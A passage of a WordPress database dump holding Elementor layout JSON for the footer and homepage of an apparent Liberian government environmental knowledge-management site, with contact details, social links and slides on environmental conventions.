Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.19500000000000028421709430404007434844970703125,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/gef_logo.png\",\"id\":2838,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.1580000000000012505552149377763271331787109375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.67699999999999960209606797434389591217041015625},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.9700000000000006394884621840901672840118408203125,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416000000000000369482222595252096652984619140625},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.1120000000000000994759830064140260219573974609375},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":44.13199999999999789679350215010344982147216796875,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.339999999999999857891452847979962825775146484375},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22%20EKMS.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27145,3944,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27149,3945,'_elementor_edit_mode','builder'),(27150,3945,'_elementor_template_type','footer'),(27151,3945,'_elementor_version','3.4.0'),(27152,3945,'_elementor_pro_version','3.3.6'),(27153,3945,'_wp_page_template','default'),(27154,3945,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.910000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.9909999999999996589394868351519107818603515625,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/join-the-community\\/\\\">Join here!<\\/a><\\/span>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.92699999999999960209606797434389591217041015625},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.14699999999999846522769075818359851837158203125},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.19500000000000028421709430404007434844970703125,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/gef_logo.png\",\"id\":2838,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.1580000000000012505552149377763271331787109375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.67699999999999960209606797434389591217041015625},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.9700000000000006394884621840901672840118408203125,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416000000000000369482222595252096652984619140625},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.1120000000000000994759830064140260219573974609375},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":44.13199999999999789679350215010344982147216796875,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.339999999999999857891452847979962825775146484375},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22%20EKMS.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38609,87,'_elementor_css','a:6:{s:4:\"time\";i:1770885038;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(27156,3945,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27171,3947,'_wp_page_template','default'),(27172,3947,'_elementor_edit_mode','builder'),(27173,3947,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.237},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.08},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.347},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All 